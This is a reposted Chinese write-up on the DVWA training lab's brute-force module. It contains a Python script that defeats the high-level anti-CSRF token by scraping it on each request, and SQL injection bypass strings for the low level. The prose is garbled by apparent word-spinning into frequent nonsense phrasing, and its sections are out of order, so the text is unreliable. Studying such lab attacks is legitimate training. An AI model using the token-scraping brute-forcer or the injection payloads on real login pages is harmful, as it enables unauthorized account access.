澳门至尊网站-首页

您的位置:澳门至尊网站 > 软件综合 > 证实的表单诉求,暴力破解

证实的表单诉求,暴力破解

2019-10-27 14:14

图片 1图片 2

本连串文集:DVWA学习笔记

在该模块中加进了二个潜藏的字段 user_token 来严防暴力破解,每当访谈该页面都会变动一个新的 token 值。提交央求必须带领该值况且每种值只可以接收叁遍,此处便无法直接行使 burp 进行简易的穷举,能够写多个 python 脚本来举行爆破。

图片 31.png

 爆破程序如下:

分析:isset函数在php中用来检验变量是或不是设置(该函数重返的是布尔类型的值,即true/false)能够看出,服务器只是认证了参数Login是或不是棉被服装置,未有别的的防止爆炸破机制,且对参数username、password未有做任何过滤,存在鲜明的sql注入漏洞。

 1 from lxml import etree
 2 import requests
 3 
 4 
 5 def sendRquest(username, password):
 6     # 构造请求头
 7     headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:50.0) Gecko/20100101'}
 8     cookies = {
 9         'csrftoken': 'Agc1Hwcy4qrwOClBfzTrrlkh2R1pnRCtNxvDX24geS7lSOyEEzfPDE4R1evXsXqR',
10         'PHPSESSID': '29daa35c77875e7c9513e8c88cee0493',
11         'security': 'high',
12     }
13 
14     # 获取 user_token 值
15     url = 'http://127.0.0.1/vulnerabilities/brute/'
16     response = requests.get(url=url, cookies=cookies, headers=headers)
17     html = etree.HTML(response.text)
18     user_token = html.xpath('//form/input[@name="user_token"]/@value')[0]
19 
20     # 重新构造 url
21     url = 'http://127.0.0.1/vulnerabilities/brute/?username=' + username + '&password=' + password + '&Login=Login&user_token=' + user_token
22     response = requests.get(url=url, cookies=cookies, headers=headers)
23 
24     # 判断是否爆破成功
25     if "Username and/or password incorrect." not in response.text:
26         print('成功:', username, password)
27         exit()
28     else:
29         print('失败:', username, password)
30 
31 
32 def main():
33     with open('/Users/zhenghuajing/Desktop/password.txt', 'r') as file:
34         for line in file.readlines():
35             sendRquest('admin', line.strip('n'))
36 
37 
38 if __name__ == '__main__':
39     main()

措施黄金时代行使burpsuite爆破1.抓包

程序推行效果如下:

图片 42.png2.发送到intruder模块,进行爆破密码图片 53.png

图片 6

3.基于在爆破结果中找到准确的密码,可以看见password的响应包长度“独出心栽”,可猜测password为不易密码,手工验证登录成功。

图片 74.png

方式二手工sql注入

  1. Username:admin’ or ’1′=’1Password:

  2. Username :admin’ #Password :

图片 85.png图片 96.png

分析:Medium等第的代码主要扩展了mysql_real_escape_string函数,这一个函数会对字符串中的特殊符号(x00,n,r,,’,”,x1a)进行转义,基本上能够抵挡sql注入攻击,同时$pass做了MD5校验,杜绝了经过参数password举行sql注入的可能性。不过,依然没有参与使得的防止爆炸破机制.

方法:就算sql注入不再有效,但照样得以采取Burpsuite举办爆破,与Low等第的爆破艺术基本相仿。

图片 107.png

分析:High级其余代码参加了checkToken,能够对抗CSCRUISERF攻击,同不经常候也大增了爆破的难度,通过抓包,能够看看,登陆验证时交由了多个参数:username、password、Login以致user_token。

图片 118.png

老是服务器重回的登录页面中都会蕴藏三个无限定的user_token的值,客商每回登陆时都要将user_token一齐提交。服务器收到央浼后,会先行做token的检查,再张开sql查询。同时,High等第的代码中,使用了stripslashes(去除字符串中的反斜线字符,借使有八个一而再一而再再而三的反斜线,则只去掉三个)、 mysql_real_escape_string对参数username、password进行过滤、转义,进一步抵御sql注入。

本文由澳门至尊网站发布于软件综合,转载请注明出处:证实的表单诉求,暴力破解

关键词: